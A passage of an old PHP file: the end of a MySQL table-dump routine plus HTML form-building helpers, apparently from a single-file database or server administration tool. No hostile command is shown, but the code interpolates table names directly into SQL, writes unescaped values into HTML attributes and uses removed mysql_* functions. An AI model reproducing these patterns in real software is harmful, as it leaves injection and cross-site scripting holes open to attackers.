920if (!$firstfield) {
921$tabledump .= ",\n";
922} else {
923$firstfield=0;
924}
925$tabledump .= " $field[Field] $field[Type]";
926if (!empty($field["Default"])) {
927$tabledump .= " DEFAULT '$field[Default]'";
928}
929if ($field['Null'] != "YES") {
930$tabledump .= " NOT NULL";
931}
932if ($field['Extra'] != "") {
933$tabledump .= " $field[Extra]";
934}
935}
936fr($fields);
937$keys = q("SHOW KEYS FROM $table");
938while ($key = mysql_fetch_array($keys)) {
939$kname=$key['Key_name'];
940if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
941$kname="UNIQUE|$kname";
942}
943if(!is_array($index[$kname])) {
944$index[$kname] = array();
945}
946$index[$kname][] = $key['Column_name'];
947}
948fr($keys);
949
950while(list($kname, $columns) = @each($index)) {
951$tabledump .= ",\n";
952$colnames=implode($columns,",");
953
954if ($kname == "PRIMARY") {
955$tabledump .= " PRIMARY KEY ($colnames)";
956} else {
957if (substr($kname,0,6) == "UNIQUE") {
958$kname=substr($kname,7);
959}
960$tabledump .= " KEY $kname ($colnames)";
961}
962}
963
964$tabledump .= "\n);\n\n";
965if ($fp) {
966fwrite($fp,$tabledump);
967} else {
968echo $tabledump;
969}
970
971$rows = q("SELECT * FROM $table");
972$numfields = mysql_num_fields($rows);
973while ($row = mysql_fetch_array($rows)) {
974$tabledump = "INSERT INTO $table VALUES(";
975
976$fieldcounter=-1;
977$firstfield=1;
978while (++$fieldcounter<$numfields) {
979if (!$firstfield) {
980$tabledump.=", ";
981} else {
982$firstfield=0;
983}
984
985if (!isset($row[$fieldcounter])) {
986$tabledump .= "NULL";
987} else {
988$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
989}
990}
991$tabledump .= ");\n";
992if ($fp) {
993fwrite($fp,$tabledump);
994} else {
995echo $tabledump;
996}
997}
998fr($rows);
999if ($fp) {
1000fwrite($fp,"\n");
1001} else {
1002echo "\n";
1003}
1004}
1005
1006function ue($str){
1007return urlencode($str);
1008}
1009
1010function p($str){
1011echo $str."\n";
1012}
1013
1014function tbhead() {
1015p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
1016}
1017function tbfoot(){
1018p('</table>');
1019}
1020
1021function makehide($name,$value=''){
1022p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
1023}
1024
1025function makeinput($arg = array()){
1026$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
1027$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
1028!$arg['type'] && $arg['type'] = 'text';
1029$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
1030$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
1031if ($arg['newline']) {
1032p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
1033} else {
1034p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
1035}
1036}
1037
1038function makeselect($arg = array()){
1039if ($arg['onchange']) {
1040$onchange = 'onchange="'.$arg['onchange'].'"';
1041}
1042$arg['title'] = $arg['title'] ? $arg['title'] : '';
1043if ($arg['newline']) p('<p>');
1044p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
1045if (is_array($arg['option'])) {
1046foreach ($arg['option'] as $key=>$value) {
1047if ($arg['selected']==$key) {
1048p("<option value=\"$key\" selected>$value</option>");
1049} else {
1050p("<option value=\"$key\">$value</option>");
1051}
1052}
1053}
1054p("</select>");
1055if ($arg['newline']) p('</p>');
1056}
1057function formhead($arg = array()) {
1058!$arg['method'] && $arg['method'] = 'post';
1059!$arg['action'] && $arg['action'] = $self;
1060$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
1061!$arg['name'] && $arg['name'] = 'form1';
1062p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
1063if ($arg['title']) {
1064p('<h2>'.$arg['title'].' »</h2>');
1065}
1066}
1067
1068function maketext($arg = array()){
1069!$arg['cols'] && $arg['cols'] = 100;
1070!$arg['rows'] && $arg['rows'] = 25;
1071$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
1072p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
1073}
1074
1075function formfooter($name = ''){
1076!$name && $name = 'submit';
1077p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
1078p('</form>');
1079}
1080
1081function formfoot(){
1082p('</form>');
1083}
1084
1085function pr($a) {
1086echo '<pre>';
1087print_r($a);
1088echo '</pre></div>';
1089}
1090?>